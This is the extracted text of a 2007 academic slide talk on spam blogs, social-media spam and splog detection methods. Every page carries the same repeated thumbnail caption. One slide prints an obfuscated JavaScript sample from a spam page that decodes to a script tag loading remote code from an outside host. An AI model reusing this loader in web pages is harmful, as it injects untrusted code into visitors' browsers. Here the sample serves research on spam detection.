![Page 1: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/1.jpg)
Pranam Kolari, Tim FininAkshay Java, Anupam Joshi
March 25, 2007
![Page 2: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/2.jpg)
• Spam on the Internet– Variants
– Social Media Spam
• Reason behind Spam in Blogs
• Detecting Spam Blogs
• Trends and Issues
• How can you help?
• Conclusions
![Page 3: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/3.jpg)
Pranam Kolari is a UMBC PhDstudent. His dissertation is onspam blog detection, with tools developed in use both by academia and industry. He has active research interest in internal corporate blogs, the Semantic Web and blog analytics.
Akshay Java is a UMBC PhD student. His dissertation is on identify-ing influence and opinions insocial media. His research interests include blog analytics, information retrieval, natural language processing and the Semantic Web.
Tim Finin is a UMBC Professorwith over 30 years of experiencein the applying AI to information systems, intelligent interfaces and robotics. Current interests include social media, the Semantic Web and multi-agent systems.
Anupam Joshi is a UMBC Pro-fessor with research interests inthe broad area of networkedcomputing and intelligent systems. He currently serves on the editorial board of the International Journal of the Semantic Web and Information.
![Page 4: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/4.jpg)
![Page 5: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/5.jpg)
• Early form seen around 1992 with MAKE MONEY FAST
• 80-85% of all e-mail traffic is spam
• In numbers
Sources: IronPort, Wikipediahttp://www.ironport.com/company/ironport_pr_2006-06-28.html
2005 - (June) 30 billion per day2006 - (June) 55 billion per day2006 - (December) 85 billion per day 2007 - (February) 90 billion per day
![Page 6: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/6.jpg)
![Page 7: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/7.jpg)
• “Unsolicited usually commercial e-mail sent to a large number of addresses” – Merriam Webster Online
• “Spamming is the abuse of electronic messaging systems to send unsolicited bulk messages, which are almost universally undesired.” – Wikipedia
• As the Internet has supported new applications, many other forms are common, requiring a much broader definition
Capturing user attention unjustifiably on the Internet (E-mail, Web, Social Media
etc..)
![Page 8: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/8.jpg)
Direct Indirect
E-Mail Spam
General Web Spam
Spam Blogs (Splogs)
IM Spam (SPIM)
Internet Spam
(Forms)
(Mechanisms)
Community Spam
Comment Spam
Tag Spam
![Page 9: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/9.jpg)
• Compromises Relevance and Importance Scores used by Search Engines
• Mostly effects the long tail of keywords (more susceptible)
• Spam in Blogs is a form of spamdexing• 20% of the indexed Web (2005)
“We use the term spamming (also, spamdexing) to refer to any deliberate human action that is meant to trigger an unjustifiably favorable relevance or importancefor a page, considering the page’s true value” – Gyongyi et al
![Page 10: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/10.jpg)
![Page 11: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/11.jpg)
![Page 12: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/12.jpg)
Direct Indirect
E-Mail Spam
General Web Spam
Spam Blogs (Splogs)
IM Spam (SPIM)
Internet Spam
(Forms)
(Mechanisms)
Community Spam
Comment Spam
Tag Spam
![Page 13: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/13.jpg)
• Sybil attack – “in computer security is an attack wherein a reputation
system is subverted by forging identities in peer-to-peernetworks” – Wikipedia
• Users that sell– http://usersubmitter.com $20, plus $1 per digg– Spike the vote, site sold on eBay, bought by digg user,
finally shut down by digg– Geekforlife, a top 100 digg user, sold his account for $822
on eBay
• In addition to direct spam, DIGG popular page also results in high ranking on search engines (Spamdexing)
![Page 14: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/14.jpg)
“Why Are People Fascinated By Photographs of Crowds?”• Author Submits Story• 4 hours later only one DIGG on the story• Seeks out User/Submitter• 12 hours later a DIGG Popular Story
![Page 15: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/15.jpg)
• Social Bookmark Tools– del.icio.us spam in long tail
– Furl popular page spam
• Also used for spamdexing
![Page 16: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/16.jpg)
![Page 17: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/17.jpg)
• Fake Profile Image
• Fake users
• Fake site visits
• Fake co-authors
• Add friends
• Comment Spam
![Page 18: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/18.jpg)
Widget Spam
Admiration Spam!?
![Page 19: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/19.jpg)
• MySpace is the (5th) 4th highest visited site
• Direct User Targeting– Free Products
– CAMS
![Page 20: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/20.jpg)
The Hoodia Scam• Create an “interesting” profile• Aggressively add friends (+Sybil Attacks)• Wall Hoodia Comments
![Page 21: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/21.jpg)
• Community Oriented Spam extends across almost all tools
![Page 22: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/22.jpg)
It does not take long for spammers to exploit a new form of social media– Wiki(pedia) Spam
the wikipedia community deletes spam articles and pages– Guestbook Spam
yes, some still have guestbooks and they attract spam entries– IRC spam
bots on IRC channels send you unwanted messages– Second life spam
notecards pop up with unwanted messages– Twitter spam
it appeared about a week after Twitter went big time– Semantic web spam
this one has not yet been seen
![Page 23: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/23.jpg)
![Page 24: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/24.jpg)
![Page 25: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/25.jpg)
• Identify Profitable Contexts• Create multiple doorway pages (or blogs)• Spamdex doorways
– Target Relevance Scores• TFIDF • Meta-tag
– Target Importance Scores• PageRank
• (Or) Game Sponsored Search– Search Engine Arbitrage
• Monetize– Affiliate Programs– Contextual Advertisements
![Page 26: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/26.jpg)
![Page 27: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/27.jpg)
Doorway Page for“Student Loan Consolidation”
![Page 28: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/28.jpg)
10K in-links!
![Page 29: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/29.jpg)
![Page 30: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/30.jpg)
Browser Javascript Redirect for Users
![Page 31: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/31.jpg)
eval(unescape("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%73%63%72%69%70%74%20%73%72%63%3d%27%68%74%74%22%2b%22%70%3a%2f%2f%62%69%67%22%2b%22%68%71%2e%69%6e%66%6f%2f%73%74%61%74%73%32%2e%70%68%70%3f%69%22%2b%22%64%3d%31%32%26%67%72%6f%75%70%3d%32%27%3e%3c%2f%73%63%72%69%70%74%22%2b%22%3e%22%29%3b"))
document.write(“<script
src='htt"+"p://big"+"hq.info/stats2.php?i"+"d=12&group=2'>");
![Page 32: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/32.jpg)
“LEADS” to affiliates highly profitable
![Page 33: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/33.jpg)
Spam pages,Spam Blogs,Spam Comments,Guestbook SpamWiki Spam
SERP
Search Engines
Affiliate ProgramsContext Ads
ads/affiliate linksarbitrage
in-links
spamdex
JavaScript Redirect[Previously Cloaking]
Affiliate Program Buyers
Spam pages,Spam Blogs[DOORWAY]
![Page 34: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/34.jpg)
• Spam Blogs– Quickly indexed by search engines (ping servers)
– Can be hosted on third party services with high authority and trust (e.g. blogspot)
– Search engines show a higher preference to blogs – crawling and ranking
• Spam Comments– In-links from high authoring blog sites indexed frequently
– “no-follow” not universally used
• In both cases blogs provide quicker return on investment to spammers
![Page 35: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/35.jpg)
![Page 36: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/36.jpg)
Lansing, MI5.
Orlando, FL4.
San Francisco, CA3.
Washington DC2.
Mountain View, CA1.
56% of all blogs are splogs! Silicon Valley or Splog Valley?
• Sampled weblogs.com during the last week of January
• 8.3 Million Pings
• Used existing splog detection tools
• Around 10% error rate
![Page 37: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/37.jpg)
![Page 38: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/38.jpg)
auto buy california cancer card casino cheapconsolidation credit debt diet discount equipment
estate finance florida forex free gift golf health
hotel insurance jewelry lawyer loan loans
medical money mortgagenewonlinephone poker rental sale software texas tradingtravel used vacation video wedding
High PPC contexts are primary spam drivers
![Page 39: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/39.jpg)
![Page 40: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/40.jpg)
• Splogs reduce user trust on social web ranking, making them visit web-pages they can well do without
• Splog content is often plagiarized• Splogs demote value of authentic content• Splogs steal advertising (referral) revenue
from authentic content producers• Splogs stress the blogosphere infrastructure• Splogs skew results of market research tools
![Page 41: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/41.jpg)
![Page 42: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/42.jpg)
“Honestly, Do you think people who make $10k/month from adsense make blogs manually? Come on, they need to make them as fast as possible. Save Time = More Money! It's Common SENSE! How much money do you think you will save if you can increase your work pace by a hundred times? Think about it…”
“Discover The Amazing Stealth Traffic Secrets Insiders Use To Drive Thousands Of Targeted Visitors To Any Site They Desire!”
“Holy Grail Of Advertising... “
“Easily Dominate Any Market, AnySearch Engine, Any Keyword.”$ 197
![Page 43: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/43.jpg)
![Page 44: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/44.jpg)
Our splog bait was picked up and used by dozens of sploggers
![Page 45: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/45.jpg)
![Page 46: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/46.jpg)
![Page 47: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/47.jpg)
• Content Source– Plagiarized
– Article Directories
• Content Manipulation– Dictionary
– Word Shuffling
– Sentence Shuffling
• Multi-lingual Support!
• However, Pro-sploggers don’t use these tools
![Page 48: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/48.jpg)
![Page 49: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/49.jpg)
Update Pings
Update Pings
Ping Stream
1
2
Update Stream
Fetch Content
3
4
1 2 3 4( )
![Page 50: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/50.jpg)
![Page 51: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/51.jpg)
![Page 52: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/52.jpg)
![Page 53: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/53.jpg)
![Page 54: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/54.jpg)
![Page 55: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/55.jpg)
• Captcha Breaker
• Computer• Content• Affiliate Accounts
![Page 56: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/56.jpg)
![Page 57: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/57.jpg)
![Page 58: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/58.jpg)
Given a blog identified by its URL X, is it spam?
How is this different from other
spam detection problems?
![Page 59: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/59.jpg)
What and When of filteringE-mail Spam Web Spam Social Network
SpamSpam Blogs
time time
posts
time
friends
![Page 60: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/60.jpg)
Constraints on the Filter
• Users• E-mail ServiceProvider
E-mail Spam Web Spam Social NetworkSpam
Spam Blogs
• Search Engines• Page Hosting Services (eg. Tripod)
• Web Search Engines• Blog Search Engines• Blog Hosting Services• (Ping Servers)
• Community Sites
Who actively uses it?
• Fast Detection• Low Overhead• Online
• Batch Detection• Mostly Offline
• Fast Detection• Low Overhead
• Fast Detection• Batch Detection
![Page 61: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/61.jpg)
Adversarial Attacks on the FilterE-mail Spam Web Spam Social Network
SpamSpam Blogs
• Image Spam• Character Replacement
• Scripts• Doorways
• Scripts• Doorways• Deceptive Behavior
• Deceptive Behavior
![Page 62: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/62.jpg)
• Pre-indexing at Ping Stream
• Post-indexing
• Blacklists/Whitelists
• URL Based Features
• Home-Page Based Features
• Feed Based Features (Temporal)
• Link Based Features
![Page 63: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/63.jpg)
Filters deployed on Ping Streams (typically)..
![Page 64: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/64.jpg)
![Page 65: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/65.jpg)
![Page 66: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/66.jpg)
• Intuition: Most self-hosted blogs are tied to “spammer-friendly” domain hosting services
• Map Ping URL’s to IP Addresses
• Rank IP Addresses by hosted blogs
• Pick the top 100 (say)– Randomly sample for a subset of blogs
– Verify no false positives
– Add IP to Blacklist
• Actively used by a2b.cc and many others
![Page 67: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/67.jpg)
Models over name and URL values canbe very effective
![Page 68: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/68.jpg)
• The Blogspot “?” filter
• The hyphen filter
• .. and many more
• Very effective and fast
• A reactive measure
• Active Supervision
• Highly susceptible to Adversarial Attacks
![Page 69: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/69.jpg)
Text token based features over name and URL canbe very effective
![Page 70: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/70.jpg)
• Intuition: Spammers target search engines through context rich URLs
• No page fetches – can be very fast• Techniques vary
– How are URLs segmented • Hyphens, forward slashes etc..• Supervised Segmentation Technique• Character N-grams
– How are detection models constructed• SVMs• Bayesian Filters
![Page 71: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/71.jpg)
• Motivation: Spammers glue words in URL• Learn Segmentation using spamming contexts
as proposed by Salvetti et al
Salvetti et al
http://dietsthatwork.blogspot.com
http
dietsthatwork
blogspot
com http
diets that work
blogspot
com
Naïve Approach Enhanced Approach
![Page 72: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/72.jpg)
• Train a Bayesian Classifier (10K +, 10K -)
• 1k test samples
• F-measure 76% spam, 79% authentic
• Human Baseline 73% spam, 78% authentic
• Classifier beats humans when identifying spam using URLs alone!
![Page 73: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/73.jpg)
blogdriveweblogindiatimespublicnamepodcastradiotopixdirectory
infomedicalrentalforexinsuranceweddingseoautochannel
• SVM based approach• Hand Verified Samples of 2K spam
URLs and 2K authentic URLs from ping server
• N-character gram tokenization• Linear Kernel• Binary Features
• F-measure ~ 90%
programbrandconsumertodayusersjournalblogblogspottypepad
domainanswergroupsfordacnereviewsloansharehoodia
![Page 74: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/74.jpg)
• Intuition: Home-Page can provide a good snapshot of a blog (most recent posts), and also captures blog-rolls and link-rolls
• Only one page fetch per URL – can be very fast
• Techniques vary by selected features– Bag-of-words
– Bag-of-tokenized-outlinks
– Text Compression
